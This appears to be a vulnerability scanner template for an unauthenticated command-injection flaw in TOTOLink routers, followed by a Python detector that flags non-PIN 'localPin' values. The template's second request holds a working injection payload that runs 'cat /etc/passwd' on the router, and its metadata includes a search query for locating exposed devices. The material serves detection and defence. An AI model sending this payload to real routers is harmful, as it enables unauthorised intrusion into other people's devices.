Vulnerability Description
TOTOLink routers are vulnerable to unauthenticated remote command execution via the /boaform/formWsc endpoint. An attacker can inject OS commands through the localPin parameter.
id: totolink-boaform-rce

info:
  name: TOTOLink Router - Remote Command Execution
  author: ritikchaddha
  severity: critical
  description: |
    TOTOLink routers are vulnerable to unauthenticated remote command execution via the /boaform/formWsc endpoint. An attacker can inject OS commands through the localPin parameter.
  reference:
    - https://github.com/fizz-is-on-the-way/Iot_vuls/blob/main/N150RT/RCE_formWsc/README.md
  classification:
    cwe-id: CWE-78
  metadata:
    max-request: 2
    product: TOTOLINK
    fofa-query: title="TOTOLINK"
  tags: totolink,rce,router,boaform,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code==200'
          - 'contains(tolower(body), "totolink")'
        condition: and
        internal: true

  - raw:
      - |
        POST /boaform/formWsc HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        targetAPMac=001A2B3C4D5E&targetAPSsid=3232&submit-url=aaaaaa&localPin=aaaa%20||%20cat%20/etc/passwd

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022015273a94d319b86a2a5a2c236da7f179670910ac0359250a2e1f9a558ab7301602210083338915aab313861f06ccfa6b1a98627100bbd08e6ef64d3d362fcd90dcdeb5:922c64590222798bb761d5b6d8e72950
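
On the defensive side, the request this template sends can be recognised in proxy or capture logs by allowlisting the `localPin` value. The following is an added example, not part of the template or the referenced advisory; it assumes `localPin` carries a WPS PIN (4 or 8 decimal digits), and the function names, host name and sample requests are constructed for illustration.

```python
import re
from typing import Optional
from urllib.parse import parse_qs

TARGET_PATH = "/boaform/formWsc"
# Assumption: localPin is a WPS PIN, i.e. exactly 4 or 8 decimal digits.
PIN_RE = re.compile(r"\d{4}|\d{8}")

def inspect_request(raw: str) -> Optional[str]:
    """Return a finding for a raw HTTP request, or None if it looks benign."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    parts = head.split("\n", 1)[0].split()
    if len(parts) < 2 or parts[0].upper() != "POST":
        return None
    if parts[1].split("?", 1)[0] != TARGET_PATH:
        return None
    # parse_qs URL-decodes values, so %20, %7C and similar encodings are normalised.
    params = parse_qs(body.strip(), keep_blank_values=True)
    for value in params.get("localPin", []):
        if not PIN_RE.fullmatch(value):
            return f"non-PIN localPin on {TARGET_PATH}: {value!r}"
    return None

# Constructed sample requests (the first body is the one from the template above).
SAMPLES = {
    "template_probe": (
        "POST /boaform/formWsc HTTP/1.1\r\nHost: router.example\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
        "targetAPMac=001A2B3C4D5E&targetAPSsid=3232&submit-url=aaaaaa"
        "&localPin=aaaa%20||%20cat%20/etc/passwd"
    ),
    "benign_pin": (
        "POST /boaform/formWsc HTTP/1.1\r\nHost: router.example\r\n\r\n"
        "targetAPMac=001A2B3C4D5E&targetAPSsid=home&localPin=12345670"
    ),
    "other_page": "GET / HTTP/1.1\r\nHost: router.example\r\n\r\n",
}

def scan(samples: dict) -> dict:
    """Map each sample name to its finding, keeping only flagged requests."""
    findings = {name: inspect_request(raw) for name, raw in samples.items()}
    return {name: f for name, f in findings.items() if f}

if __name__ == "__main__":
    for name, finding in scan(SAMPLES).items():
        print(name, "->", finding)
```

Because the check is an allowlist on the decoded value rather than a list of shell metacharacters, it does not depend on which separator or encoding a request uses.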